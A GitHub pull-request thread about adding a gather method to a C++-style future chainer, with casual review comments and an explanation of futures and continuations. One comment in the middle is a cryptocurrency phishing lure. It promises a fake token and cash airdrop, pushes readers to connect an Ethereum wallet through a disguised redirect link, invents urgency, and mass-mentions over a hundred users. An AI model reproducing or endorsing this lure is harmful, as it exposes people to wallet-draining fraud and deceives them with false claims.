### PR TITLE
Add gather method in future chainer

### PR DESCRIPTION
**Pull request by KYLChiu**

### CODE REVIEW

**Review by ccjeremylo — APPROVED** [review]
looks good to me lol (seriously though...I should practise code review more)

**Comment by ccjeremylo** [comment]
Can you add some context...no idea what I am reading

You are implementing a linked list right? what is a future chainer?

**Comment by KYLChiu** [comment]
> Can you add some context...no idea what I am reading
> 
> You are implementing a linked list right? what is a future chainer?

Linked list impl is kinda bad atm tbh, will update later...

Future is structure representing a result you'll get later on (from an async operation, e.g. from another thread)... future chaining lets you link these futures into one chain - so that once the prior future is ready, we can run a continuation function on the result obtained from that prior future. See the examples

**Comment by ccjeremylo** [comment]
Seems I already approved this, but I guess need to re-approve after you pushed again?

or are we just missing @claudiayip 's approve for this PR?

**Review by ccjeremylo — APPROVED** [review]
approve?

**Comment by ccjeremylo** [comment]
> Seems I already approved this, but I guess need to re-approve after you pushed again?
> 
> or are we just missing @claudiayip 's approve for this PR?

Was being dumb - think I approved it now

**Comment by ccjeremylo** [comment]
> > Can you add some context...no idea what I am reading
> > You are implementing a linked list right? what is a future chainer?
> 
> Linked list impl is kinda bad atm tbh, will update later...
> 
> Future is a structure representing a result you'll get later on (from an async operation, e.g. from another thread)... future chaining is just some convenience method which lets you link these futures into one chain - so that once the prior future is ready, we can (immediately) run a continuation function on the result obtained once prior future finishes evaluation. If you look at the comments there are some examples. The original idea comes from Javascript A* promises but that stuff is too tedious to implement.

Sounds so complicated...do you have examples in your PR?

**Comment by kobirbd18** [comment]
[Banner](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
smfxfc, @giabaocorn20, @scastellanog, @lostmartian, @nick-work, @davidt12345, @scottRuiter, @tiwilliam, @erick-tejada, @vietcuong2816, @coderj001, @clyde-strydom, @xwillorg, @marcoszh, @sahiljoshi, @zhigeng, @jordankiggundu, @gcheshkov, @oxzoid, @wisfern, @tgall12, @lanbuithe, @vecijazz, @Desireokezie, @qwertymjs, @JohniFx, @ashigro, @baryshev, @jselmani, @Mysterytrade827, @lguoca, @maximillian42, @s-brez, @picktim, @nizq, @chunyip135, @ADoggydawggg, @rtrivedi-cubesmart, @MyEthWorks, @mpalenciaolivar, @siddharthmankar, @niloysaha, @20209805, @OdinLin, @ProfitPhenom, @alt3rmann, @YimingZhang07, @IkViGaa, @JJstroker01, @machinevisionbeansalirezahdry, @Code0987, @dharmatech, @eddipa, @Lucius-Kahng, @fastyangmh, @tinaishe-dr16, @ricezet, @sergeiwallace, @roywwei, @wnwkr13, @FernandoHiagon, @galipusta, @andq, @fraineralex, @dumpmemory, @macd42, @acsybt, @bluecollar, @wayhome, @AndreaCodegoni, @xiehai1983, @rockingbuddha, @sarthakkaushik, @JackLongKing, @joestanl3y, @AhmadAlmousa, @joakimhellum, @apervola, @nigerninja, @omasanori, @stupidhumans, @vincefl, @35Mill, @Pankaj21A, @jonkarde, @billtron, @daamine, @JSquaredJace, @AndMass, @coppers-j, @Arboghast, @Buen16, @slayerjoelk, @benletchford, @qq776355102, @dahebolangkuan, @khc25, @sto803, @LRossdeutscherEarthnook, @maxclchen, @jamieborder, @uwDavid, @pshushereba, @tillkrischer, @AhmadAlmousa, @mrtoper, @austinsmoss, @Playr101, @pd000, @from1to9, @jmcph4, @balakaygotowar, @bonfix, @calcite12onLimewire, @tomwilde, @franmmd, @shilik, @Himank-Khatri, @rikurb8, @JiungPark, @Lucius-Kahng, @amaozhao, @brandonbondig, @Alex119sd, @handlemyfinance, @sergeiwallace, @SevanKambel, @alirezahdry, @HeyWY1, @kazizi-swe, @Gateway2016, @sunsetcoder, @mnymark, @hendrikjap, @roywwei, @plamendev, @lunchforsoup, @Slay1007, @andq, @Master1978, @Smit-create, @Lowerce, @TheyCallMeSticky, @OliverOE1509, @ben-jit, @ashervandevort, @jinczing, @JMA6971

**Pull request merged**
